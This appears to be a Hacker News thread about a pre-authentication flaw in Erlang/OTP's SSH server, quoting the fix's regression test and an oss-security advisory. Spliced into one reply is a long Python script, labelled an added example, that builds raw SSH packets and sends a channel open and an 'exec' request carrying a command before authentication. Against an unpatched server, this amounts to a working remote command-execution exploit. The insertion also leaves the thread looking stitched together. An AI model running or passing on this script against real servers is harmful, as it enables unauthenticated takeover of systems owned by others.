
198 points kimi | 1 comment
formerly_proven No.43718329
If I interpret the patch correctly, the issue seems to be that you could just ask for a channel and do a request_exec before authenticating. The regression test is:

    {send, hello},                                  % client identification string
    {send, ssh_msg_kexinit},                        % client KEXINIT: key exchange started, never completed
    {match, #ssh_msg_kexinit{_='_'}, receive_msg},  % server's KEXINIT arrives
    {send, SshMsgChannelOpen},                      % connection-protocol messages before any authentication
    {send, SshMsgChannelRequest},
    {match, disconnect(), receive_msg}              % the fixed server must answer with a disconnect
https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a...

edit: Ah, found by the people at RUB; they do a lot of research in verifying protocol implementations, iirc.

replies(4): >>43718365 >>43718897 >>43719016 >>43720515
password4321 No.43720515
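The sequence in the regression test above, replayed in plain Python as an added example (not code from the thread or from the OTP project): send the client hello and KEXINIT, wait for the server's KEXINIT, then send SSH_MSG_CHANNEL_OPEN and an "exec" SSH_MSG_CHANNEL_REQUEST while the connection is still unauthenticated and unencrypted, and report whether the server answers with SSH_MSG_DISCONNECT. Packet framing and message numbers follow RFC 4253/4254; the host and port, the algorithm names in the KEXINIT, the channel window sizes and the placeholder command are assumptions chosen for illustration. The sample disconnect payload is constructed inline so the parsing and classification can be exercised offline.

```python
# Added example, not from the HN thread or the OTP project: replays the
# regression test's pre-auth message sequence against a live SSH server.
# RFC 4253/4254 framing and message numbers are standard; host, port,
# algorithm names and channel parameters below are illustrative assumptions.
import os, socket, struct, sys

SSH_MSG_DISCONNECT = 1        # RFC 4253 section 11.1
SSH_MSG_KEXINIT = 20          # RFC 4253 section 7.1
SSH_MSG_CHANNEL_OPEN = 90     # RFC 4254 section 5.1
SSH_MSG_CHANNEL_REQUEST = 98  # RFC 4254 section 5.4

def ssh_string(b: bytes) -> bytes:
    """RFC 4251 'string': uint32 big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b

def frame(payload: bytes, block: int = 8) -> bytes:
    """Unencrypted RFC 4253 section 6 packet: before NEWKEYS there is no cipher
    or MAC, so it is packet_length || padding_length || payload || padding,
    total a multiple of the block size (8 pre-kex) with >= 4 padding bytes."""
    pad = block - ((5 + len(payload)) % block)
    if pad < 4:
        pad += block
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + os.urandom(pad)

def parse_frame(data: bytes):
    """Inverse of frame(): (payload, rest); ValueError if the packet is incomplete."""
    if len(data) < 5:
        raise ValueError("need more data")
    packet_len, pad = struct.unpack(">IB", data[:5])
    end = 4 + packet_len
    if len(data) < end:
        raise ValueError("need more data")
    return data[5:end - pad], data[end:]

def kexinit_payload() -> bytes:
    """Client KEXINIT with ordinary algorithms (illustrative; kex never completes)."""
    names = [b"curve25519-sha256", b"ssh-ed25519", b"aes128-ctr", b"aes128-ctr",
             b"hmac-sha2-256", b"hmac-sha2-256", b"none", b"none", b"", b""]
    body = bytes([SSH_MSG_KEXINIT]) + os.urandom(16)   # 16-byte cookie
    body += b"".join(ssh_string(n) for n in names)
    return body + b"\x00" + b"\x00\x00\x00\x00"         # first_kex_packet_follows, reserved

def channel_open_payload(sender_channel: int = 0) -> bytes:
    """SSH_MSG_CHANNEL_OPEN 'session'; window and max packet size are arbitrary."""
    return (bytes([SSH_MSG_CHANNEL_OPEN]) + ssh_string(b"session")
            + struct.pack(">III", sender_channel, 1 << 20, 1 << 15))

def channel_request_payload(recipient: int = 0, command: bytes = b"id") -> bytes:
    """SSH_MSG_CHANNEL_REQUEST 'exec' with want_reply; the command is a placeholder."""
    return (bytes([SSH_MSG_CHANNEL_REQUEST]) + struct.pack(">I", recipient)
            + ssh_string(b"exec") + b"\x01" + ssh_string(command))

def classify_reply(payload) -> str:
    """A server enforcing the pre-auth check answers with SSH_MSG_DISCONNECT,
    which is what the regression test matches on."""
    if not payload:
        return "closed"
    return "disconnect" if payload[0] == SSH_MSG_DISCONNECT else "other:%d" % payload[0]

# Constructed sample of a server disconnect; reason 2 = SSH_DISCONNECT_PROTOCOL_ERROR.
SAMPLE_DISCONNECT = (bytes([SSH_MSG_DISCONNECT]) + struct.pack(">I", 2)
                     + ssh_string(b"Protocol error") + ssh_string(b""))

def _next_packet(sock, buf: bytes):
    """Read until one full packet is buffered; (None, buf) on close or timeout."""
    while True:
        try:
            return parse_frame(buf)
        except ValueError:
            pass
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            return None, buf
        if not chunk:
            return None, buf
        buf += chunk

def probe(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """hello, KEXINIT, then CHANNEL_OPEN + CHANNEL_REQUEST before authentication."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"SSH-2.0-probe\r\n")
        buf = b""
        while b"\n" not in buf:                    # server identification line
            chunk = s.recv(4096)
            if not chunk:
                return "closed"
            buf += chunk
        buf = buf.split(b"\n", 1)[1]
        s.sendall(frame(kexinit_payload()))
        while True:                                # wait for the server's KEXINIT
            payload, buf = _next_packet(s, buf)
            if payload is None:
                return "closed"
            if payload and payload[0] == SSH_MSG_KEXINIT:
                break
        s.sendall(frame(channel_open_payload()) + frame(channel_request_payload()))
        payload, buf = _next_packet(s, buf)
        return "timeout" if payload is None else classify_reply(payload)

if __name__ == "__main__":
    print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 22))
```

Run it as `python probe.py host [port]` against a server you are authorised to test. A result of `disconnect` is the behaviour the fixed server's regression test expects; `other:<n>` means the server replied with some message other than a disconnect to a channel request it should not have processed before authentication, which is worth examining (for example with a packet capture), and `closed` or `timeout` means no protocol-level verdict was obtained. The probe works on plaintext packets only because key exchange is deliberately never completed, exactly as in the test above.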
> The issue is caused by a flaw in the SSH protocol message handling which allows an attacker to send connection protocol messages prior to authentication.

per https://www.openwall.com/lists/oss-security/2025/04/16/2